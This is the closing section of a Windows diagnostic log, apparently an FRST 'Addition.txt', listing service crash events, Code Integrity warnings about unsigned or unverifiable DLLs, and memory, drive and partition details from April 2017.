Error: (04/27/2017 07:29:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_1a082a0 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/27/2017 07:29:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_1a082a0 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/27/2017 07:29:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_1a082a0 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/27/2017 07:29:20 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error: An instance of the service is already running.

Error: (04/27/2017 07:28:51 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Steam Client Service service terminated unexpectedly. It has done this 1 time(s).

Error: (04/27/2017 07:28:51 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Update Service(FirefoxU) service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 300000 milliseconds: Restart the service.

Error: (04/27/2017 07:28:50 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (04/27/2017 07:28:50 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The KMS-R@1n service terminated unexpectedly. It has done this 1 time(s).

CodeIntegrity:
===================================
Date: 2017-04-27 16:52:47.357
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

Date: 2017-04-14 22:54:16.521
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-14 18:38:26.183
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-12 13:20:37.159
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-07 13:24:45.442
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-03 15:24:27.229
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-01 23:31:02.545
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-01 23:25:46.100
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-01 23:14:57.326
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-04-01 13:06:45.388
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-7400 CPU @ 3.00GHz
Percentage of memory in use: 31%
Total physical RAM: 8156.17 MB
Available physical RAM: 5546.8 MB
Total Virtual: 13276.17 MB
Available Virtual: 10305.49 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:77.57 GB) (Free:40.16 GB) NTFS
Drive d: () (Fixed) (Total:853.39 GB) (Free:812.01 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 00000000)
Partition: GPT.

==================== End of Addition.txt ============================